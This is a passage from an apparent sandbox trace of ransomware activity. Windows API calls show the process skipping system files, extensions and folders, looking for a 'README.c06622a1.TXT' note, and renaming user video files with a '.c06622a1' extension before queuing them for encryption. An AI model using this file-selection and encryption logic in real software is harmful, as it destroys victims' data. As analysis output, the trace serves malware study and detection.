(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\W2MpVj.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\w2mpvj.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\W2MpVj.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\w2mpvj.mp4.c06622a1"), dwFlags=0x8) returned 1 [0168.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\W2MpVj.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\w2mpvj.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x194 [0168.905] CreateIoCompletionPort (FileHandle=0x194, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0168.905] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0168.912] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1d63cbd6 [0168.912] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x46d00b50 [0168.912] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x69e46187 [0168.912] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x28013d0e [0168.912] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3386d51a [0168.912] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xfdfc927 [0168.912] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5a071c91 [0168.912] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3e2b39dc [0168.915] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x81c77f05 [0168.915] RtlComputeCrc32 (PartialCrc=0x7f05, Buffer=0x2b70094, Length=0x80) returned 0xd5bf4568 [0168.915] RtlComputeCrc32 (PartialCrc=0x4568, Buffer=0x2b70094, Length=0x80) returned 0x29122b4c [0168.915] RtlComputeCrc32 (PartialCrc=0x2b4c, Buffer=0x2b70094, Length=0x80) returned 0x1ae7ca7b [0168.915] RtlComputeCrc32 (PartialCrc=0xca7b, Buffer=0x2b70094, Length=0x80) returned 0xd5c1ca7e [0168.915] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0168.915] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0168.916] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0168.917] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44f3eb80, ftCreationTime.dwHighDateTime=0x1d5d8c9, ftLastAccessTime.dwLowDateTime=0x5043fa50, ftLastAccessTime.dwHighDateTime=0x1d5e61d, ftLastWriteTime.dwLowDateTime=0x5043fa50, ftLastWriteTime.dwHighDateTime=0x1d5e61d, nFileSizeHigh=0x0, nFileSizeLow=0x16bd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="XpsFF-fA3iCT.swf", cAlternateFileName="XPSFF-~1.SWF")) returned 1 [0168.917] _wcsicmp (_Str1="XpsFF-fA3iCT.swf", _Str2="README.c06622a1.TXT") returned 6 [0168.917] wcsstr (_Str="XpsFF-fA3iCT.swf", _SubStr="README") returned 0x0 [0168.917] _wcsicmp (_Str1="autorun.inf", _Str2="XpsFF-fA3iCT.swf") returned -23 [0168.917] wcslen (_String="autorun.inf") returned 0xb [0168.917] _wcsicmp (_Str1="boot.ini", _Str2="XpsFF-fA3iCT.swf") returned -22 [0168.917] wcslen (_String="boot.ini") returned 0x8 [0168.917] _wcsicmp (_Str1="bootfont.bin", _Str2="XpsFF-fA3iCT.swf") returned -22 [0168.917] wcslen (_String="bootfont.bin") returned 0xc [0168.917] _wcsicmp (_Str1="bootsect.bak", _Str2="XpsFF-fA3iCT.swf") returned -22 [0168.917] wcslen (_String="bootsect.bak") returned 0xc [0168.917] _wcsicmp (_Str1="desktop.ini", _Str2="XpsFF-fA3iCT.swf") returned -20 [0168.917] wcslen (_String="desktop.ini") returned 0xb [0168.917] _wcsicmp (_Str1="iconcache.db", _Str2="XpsFF-fA3iCT.swf") returned -15 [0168.917] wcslen (_String="iconcache.db") returned 0xc [0168.918] _wcsicmp (_Str1="ntldr", _Str2="XpsFF-fA3iCT.swf") returned -10 [0168.918] wcslen (_String="ntldr") returned 0x5 [0168.918] _wcsicmp (_Str1="ntuser.dat", _Str2="XpsFF-fA3iCT.swf") returned -10 [0168.918] wcslen (_String="ntuser.dat") returned 0xa [0168.918] _wcsicmp (_Str1="ntuser.dat.log", _Str2="XpsFF-fA3iCT.swf") returned -10 [0168.918] wcslen (_String="ntuser.dat.log") returned 0xe [0168.918] _wcsicmp (_Str1="ntuser.ini", _Str2="XpsFF-fA3iCT.swf") returned -10 [0168.918] wcslen (_String="ntuser.ini") returned 0xa [0168.918] _wcsicmp (_Str1="thumbs.db", _Str2="XpsFF-fA3iCT.swf") returned -4 [0168.918] wcslen (_String="thumbs.db") returned 0x9 [0168.918] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0168.918] wcslen (_String="386") returned 0x3 [0168.918] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0168.918] wcslen (_String="adv") returned 0x3 [0168.918] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0168.918] wcslen (_String="ani") returned 0x3 [0168.918] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0168.918] wcslen (_String="bat") returned 0x3 [0168.918] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0168.918] wcslen (_String="bin") returned 0x3 [0168.918] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0168.918] wcslen (_String="cab") returned 0x3 [0168.918] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0168.918] wcslen (_String="cmd") returned 0x3 [0168.918] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0168.918] wcslen (_String="com") returned 0x3 [0168.918] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0168.918] wcslen (_String="cpl") returned 0x3 [0168.918] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0168.918] wcslen (_String="cur") returned 0x3 [0168.918] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0168.918] wcslen (_String="deskthemepack") returned 0xd [0168.918] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0168.918] wcslen (_String="diagcab") returned 0x7 [0168.918] _wcsicmp (_Str1="diagcfg", _Str2="swf") returned -15 [0168.919] wcslen (_String="diagcfg") returned 0x7 [0168.919] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0168.919] wcslen (_String="diagpkg") returned 0x7 [0168.919] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0168.919] wcslen (_String="dll") returned 0x3 [0168.919] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0168.919] wcslen (_String="drv") returned 0x3 [0168.919] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0168.919] wcslen (_String="exe") returned 0x3 [0168.919] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0168.919] wcslen (_String="hlp") returned 0x3 [0168.919] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0168.919] wcslen (_String="icl") returned 0x3 [0168.919] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0168.919] wcslen (_String="icns") returned 0x4 [0168.919] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0168.919] wcslen (_String="ico") returned 0x3 [0168.919] _wcsicmp (_Str1="ics", _Str2="swf") returned -10 [0168.919] wcslen (_String="ics") returned 0x3 [0168.919] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0168.919] wcslen (_String="idx") returned 0x3 [0168.919] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0168.919] wcslen (_String="ldf") returned 0x3 [0168.919] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0168.919] wcslen (_String="lnk") returned 0x3 [0168.919] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0168.919] wcslen (_String="mod") returned 0x3 [0168.919] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0168.919] wcslen (_String="mpa") returned 0x3 [0168.919] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0168.919] wcslen (_String="msc") returned 0x3 [0168.919] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0168.919] wcslen (_String="msp") returned 0x3 [0168.919] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0168.919] wcslen (_String="msstyles") returned 0x8 [0168.920] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0168.920] wcslen (_String="msu") returned 0x3 [0168.920] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0168.920] wcslen (_String="nls") returned 0x3 [0168.920] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0168.920] wcslen (_String="nomedia") returned 0x7 [0168.920] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0168.920] wcslen (_String="ocx") returned 0x3 [0168.920] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0168.920] wcslen (_String="prf") returned 0x3 [0168.920] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0168.920] wcslen (_String="ps1") returned 0x3 [0168.920] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0168.920] wcslen (_String="rom") returned 0x3 [0168.920] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0168.920] wcslen (_String="rtp") returned 0x3 [0168.920] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0168.920] wcslen (_String="scr") returned 0x3 [0168.920] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0168.920] wcslen (_String="shs") returned 0x3 [0168.920] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0168.920] wcslen (_String="spl") returned 0x3 [0168.920] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0168.920] wcslen (_String="sys") returned 0x3 [0168.920] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0168.920] wcslen (_String="theme") returned 0x5 [0168.920] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0168.920] wcslen (_String="themepack") returned 0x9 [0168.920] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0168.920] wcslen (_String="wpx") returned 0x3 [0168.920] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0168.920] wcslen (_String="lock") returned 0x4 [0168.920] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0168.920] wcslen (_String="key") returned 0x3 [0168.920] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0168.920] wcslen (_String="hta") returned 0x3 [0168.921] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0168.921] wcslen (_String="msi") returned 0x3 [0168.921] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0168.921] wcslen (_String="pdb") returned 0x3 [0168.921] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0168.921] wcslen (_String="sqlite") returned 0x6 [0168.921] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 0x11 [0168.921] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0168.921] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0168.921] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned 0x28 [0168.921] wcscpy (in: _Dest=0x321009a, _Source="XpsFF-fA3iCT.swf" | out: _Dest="XpsFF-fA3iCT.swf") returned="XpsFF-fA3iCT.swf" [0168.921] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XpsFF-fA3iCT.swf", dwFileAttributes=0x80) returned 1 [0168.921] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XpsFF-fA3iCT.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpsff-fa3ict.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0168.921] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.921] ReadFile (in: hFile=0x1a4, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0168.922] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xec330d35 [0168.922] RtlComputeCrc32 (PartialCrc=0xd35, Buffer=0x32ec24, Length=0x80) returned 0x239df3f [0168.922] RtlComputeCrc32 (PartialCrc=0xdf3f, Buffer=0x32ec24, Length=0x80) returned 0xcb7f268b [0168.922] RtlComputeCrc32 (PartialCrc=0x268b, Buffer=0x32ec24, Length=0x80) returned 0xef0eb861 [0168.922] RtlComputeCrc32 (PartialCrc=0xb861, Buffer=0x32ec24, Length=0x80) returned 0xb5c2a490 [0168.922] CloseHandle (hObject=0x1a4) returned 1 [0168.922] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0168.922] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XpsFF-fA3iCT.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XpsFF-fA3iCT.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XpsFF-fA3iCT.swf" [0168.922] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XpsFF-fA3iCT.swf") returned 0x39 [0168.923] wcscpy (in: _Dest=0x32200c2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.923] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XpsFF-fA3iCT.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpsff-fa3ict.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XpsFF-fA3iCT.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpsff-fa3ict.swf.c06622a1"), dwFlags=0x8) returned 1 [0168.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XpsFF-fA3iCT.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpsff-fa3ict.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a4 [0168.925] CreateIoCompletionPort (FileHandle=0x1a4, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0168.925] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3680020 [0168.932] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x21bfb3d6 [0168.932] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x645a507b [0168.932] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5dbe27c5 [0168.932] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x109812a2 [0168.932] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x61698ba8 [0168.932] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5fc3939b [0168.932] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7ff3d370 [0168.932] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x892fc20 [0168.935] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3680094, Length=0x80) returned 0xcaff7862 [0168.935] RtlComputeCrc32 (PartialCrc=0x7862, Buffer=0x3680094, Length=0x80) returned 0x2c57a1d3 [0168.935] RtlComputeCrc32 (PartialCrc=0xa1d3, Buffer=0x3680094, Length=0x80) returned 0x8d02311e [0168.935] RtlComputeCrc32 (PartialCrc=0x311e, Buffer=0x3680094, Length=0x80) returned 0xe700540d [0168.935] RtlComputeCrc32 (PartialCrc=0x540d, Buffer=0x3680094, Length=0x80) returned 0x5ad70b30 [0168.935] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3680020) returned 1 [0168.935] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0168.936] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0168.937] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0168.937] FindClose (in: hFindFile=0x154148 | out: hFindFile=0x154148) returned 1 [0168.939] _wcsicmp (_Str1="backup", _Str2="Videos") returned -20 [0168.939] wcslen (_String="backup") returned 0x6 [0168.939] _wcsicmp (_Str1="bak", _Str2="Videos") returned -20 [0168.939] wcslen (_String="bak") returned 0x3 [0168.939] _wcsicmp (_Str1="back", _Str2="Videos") returned -20 [0168.939] wcslen (_String="back") returned 0x4 [0168.939] _wcsicmp (_Str1="archive", _Str2="Videos") returned -21 [0168.939] wcslen (_String="archive") returned 0x7 [0168.939] _wcsicmp (_Str1="bckp", _Str2="Videos") returned -20 [0168.939] wcslen (_String="bckp") returned 0x4 [0168.939] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x210e20) returned 1 [0168.939] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1f8e18) returned 1 [0168.940] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0168.940] FindClose (in: hFindFile=0x152f98 | out: hFindFile=0x152f98) returned 1 [0168.940] _wcsicmp (_Str1="backup", _Str2="5p5NrGJn0jS HALPmcxz") returned 45 [0168.940] wcslen (_String="backup") returned 0x6 [0168.940] _wcsicmp (_Str1="bak", _Str2="5p5NrGJn0jS HALPmcxz") returned 45 [0168.940] wcslen (_String="bak") returned 0x3 [0168.941] _wcsicmp (_Str1="back", _Str2="5p5NrGJn0jS HALPmcxz") returned 45 [0168.941] wcslen (_String="back") returned 0x4 [0168.941] _wcsicmp (_Str1="archive", _Str2="5p5NrGJn0jS HALPmcxz") returned 44 [0168.941] wcslen (_String="archive") returned 0x7 [0168.941] _wcsicmp (_Str1="bckp", _Str2="5p5NrGJn0jS HALPmcxz") returned 45 [0168.941] wcslen (_String="bckp") returned 0x4 [0168.941] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1c0ff8) returned 1 [0168.942] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1d1000) returned 1 [0168.942] FindNextFileW (in: hFindFile=0x152f58, lpFindFileData=0x32f29c | out: lpFindFileData=0x32f29c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0168.942] FindNextFileW (in: hFindFile=0x152f58, lpFindFileData=0x32f29c | out: lpFindFileData=0x32f29c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0168.942] _wcsicmp (_Str1="$recycle.bin", _Str2="Default") returned -64 [0168.942] wcslen (_String="$recycle.bin") returned 0xc [0168.942] _wcsicmp (_Str1="config.msi", _Str2="Default") returned -1 [0168.942] wcslen (_String="config.msi") returned 0xa [0168.942] _wcsicmp (_Str1="$windows.~bt", _Str2="Default") returned -64 [0168.942] wcslen (_String="$windows.~bt") returned 0xc [0168.942] _wcsicmp (_Str1="$windows.~ws", _Str2="Default") returned -64 [0168.942] wcslen (_String="$windows.~ws") returned 0xc [0168.942] _wcsicmp (_Str1="windows", _Str2="Default") returned 19 [0168.942] wcslen (_String="windows") returned 0x7 [0168.942] _wcsicmp (_Str1="appdata", _Str2="Default") returned -3 [0168.942] wcslen (_String="appdata") returned 0x7 [0168.942] _wcsicmp (_Str1="application data", _Str2="Default") returned -3 [0168.942] wcslen (_String="application data") returned 0x10 [0168.942] _wcsicmp (_Str1="boot", _Str2="Default") returned -2 [0168.942] wcslen (_String="boot") returned 0x4 [0168.942] _wcsicmp (_Str1="google", _Str2="Default") returned 3 [0168.942] wcslen (_String="google") returned 0x6 [0168.943] _wcsicmp (_Str1="mozilla", _Str2="Default") returned 9 [0168.943] wcslen (_String="mozilla") returned 0x7 [0168.943] _wcsicmp (_Str1="program files", _Str2="Default") returned 12 [0168.943] wcslen (_String="program files") returned 0xd [0168.943] _wcsicmp (_Str1="program files (x86)", _Str2="Default") returned 12 [0168.943] wcslen (_String="program files (x86)") returned 0x13 [0168.943] _wcsicmp (_Str1="programdata", _Str2="Default") returned 12 [0168.943] wcslen (_String="programdata") returned 0xb [0168.943] _wcsicmp (_Str1="system volume information", _Str2="Default") returned 15 [0168.943] wcslen (_String="system volume information") returned 0x19 [0168.943] _wcsicmp (_Str1="tor browser", _Str2="Default") returned 16 [0168.943] wcslen (_String="tor browser") returned 0xb [0168.943] _wcsicmp (_Str1="windows.old", _Str2="Default") returned 19 [0168.943] wcslen (_String="windows.old") returned 0xb [0168.943] _wcsicmp (_Str1="intel", _Str2="Default") returned 5 [0168.943] wcslen (_String="intel") returned 0x5 [0168.943] _wcsicmp (_Str1="msocache", _Str2="Default") returned 9 [0168.943] wcslen (_String="msocache") returned 0x8 [0168.943] _wcsicmp (_Str1="perflogs", _Str2="Default") returned 12 [0168.943] wcslen (_String="perflogs") returned 0x8 [0168.943] _wcsicmp (_Str1="x64dbg", _Str2="Default") returned 20 [0168.943] wcslen (_String="x64dbg") returned 0x6 [0168.943] _wcsicmp (_Str1="public", _Str2="Default") returned 12 [0168.943] wcslen (_String="public") returned 0x6 [0168.943] _wcsicmp (_Str1="all users", _Str2="Default") returned -3 [0168.943] wcslen (_String="all users") returned 0x9 [0168.943] _wcsicmp (_Str1="default", _Str2="Default") returned 0 [0168.943] FindNextFileW (in: hFindFile=0x152f58, lpFindFileData=0x32f29c | out: lpFindFileData=0x32f29c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0168.943] FindNextFileW (in: hFindFile=0x152f58, lpFindFileData=0x32f29c | out: lpFindFileData=0x32f29c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0168.943] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0168.943] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0168.943] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0168.943] wcslen (_String="autorun.inf") returned 0xb [0168.943] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0168.943] wcslen (_String="boot.ini") returned 0x8 [0168.944] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0168.944] wcslen (_String="bootfont.bin") returned 0xc [0168.944] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0168.944] wcslen (_String="bootsect.bak") returned 0xc [0168.944] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0168.944] FindNextFileW (in: hFindFile=0x152f58, lpFindFileData=0x32f29c | out: lpFindFileData=0x32f29c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0168.944] _wcsicmp (_Str1="$recycle.bin", _Str2="Public") returned -76 [0168.944] wcslen (_String="$recycle.bin") returned 0xc [0168.944] _wcsicmp (_Str1="config.msi", _Str2="Public") returned -13 [0168.944] wcslen (_String="config.msi") returned 0xa [0168.944] _wcsicmp (_Str1="$windows.~bt", _Str2="Public") returned -76 [0168.944] wcslen (_String="$windows.~bt") returned 0xc [0168.944] _wcsicmp (_Str1="$windows.~ws", _Str2="Public") returned -76 [0168.944] wcslen (_String="$windows.~ws") returned 0xc [0168.944] _wcsicmp (_Str1="windows", _Str2="Public") returned 7 [0168.944] wcslen (_String="windows") returned 0x7 [0168.944] _wcsicmp (_Str1="appdata", _Str2="Public") returned -15 [0168.944] wcslen (_String="appdata") returned 0x7 [0168.944] _wcsicmp (_Str1="application data", _Str2="Public") returned -15 [0168.944] wcslen (_String="application data") returned 0x10 [0168.944] _wcsicmp (_Str1="boot", _Str2="Public") returned -14 [0168.944] wcslen (_String="boot") returned 0x4 [0168.944] _wcsicmp (_Str1="google", _Str2="Public") returned -9 [0168.944] wcslen (_String="google") returned 0x6 [0168.944] _wcsicmp (_Str1="mozilla", _Str2="Public") returned -3 [0168.944] wcslen (_String="mozilla") returned 0x7 [0168.944] _wcsicmp (_Str1="program files", _Str2="Public") returned -3 [0168.944] wcslen (_String="program files") returned 0xd [0168.944] _wcsicmp (_Str1="program files (x86)", _Str2="Public") returned -3 [0168.944] wcslen (_String="program files (x86)") returned 0x13 [0168.944] _wcsicmp (_Str1="programdata", _Str2="Public") returned -3 [0168.944] wcslen (_String="programdata") returned 0xb [0168.944] _wcsicmp (_Str1="system volume information", _Str2="Public") returned 3 [0168.944] wcslen (_String="system volume information") returned 